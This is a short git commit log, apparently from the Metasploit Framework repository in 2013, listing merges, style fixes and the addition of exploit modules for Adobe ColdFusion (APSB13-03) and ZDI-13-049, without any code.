Tod Beardsley
0d2746fb4c
defs should have parens when taking args
...
While it's allowed in ruby to drop most parens, many are useful for
readability.
Also adds a missing CVE.
2013-04-09 17:57:52 -05:00
Tod Beardsley
90e986860e
Adding most suggested changes to jhart's adobe module
2013-04-09 17:55:28 -05:00
Jon Hart
8a98b1af4a
Added command mode, plus fixed the dropping of payloads
2013-04-07 15:39:38 -07:00
Jon Hart
f482496795
Initial commit of an exploit module for the CVEs covered by APSB13-03.
...
Not complete but will currently get command execution on Coldfusion 9.x
instances with CSRF protection disabled
2013-04-06 20:08:50 -07:00
jvazquez-r7
358c43f6f6
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-03 19:17:53 +02:00
Tod Beardsley
e4d901d12c
Space at EOL (msftidy)
2013-04-03 09:20:01 -05:00
jvazquez-r7
070fd399f2
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-31 20:23:08 +02:00
jvazquez-r7
315abd8839
fix Privileged field
2013-03-30 19:39:01 +01:00
jvazquez-r7
a46805d95d
description updated
2013-03-30 19:36:35 +01:00
jvazquez-r7
c880a63e75
Added module for ZDI-13-049
2013-03-30 19:35:04 +01:00
jvazquez-r7
224188ddf6
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-29 21:49:40 +01:00
jvazquez-r7
714fc83cfe
Merge branch 'Ra1NX_pubcall' of https://github.com/bwall/metasploit-framework into bwall-Ra1NX_pubcall
2013-03-29 19:58:06 +01:00
bwall
21ea1c9ed4
Merge branch 'Ra1NX_pubcall' of https://github.com/bwall/metasploit-framework into Ra1NX_pubcall
2013-03-29 13:29:38 -04:00
bwall
10d9e86b42
Renamed file to be all lower case
2013-03-29 13:29:05 -04:00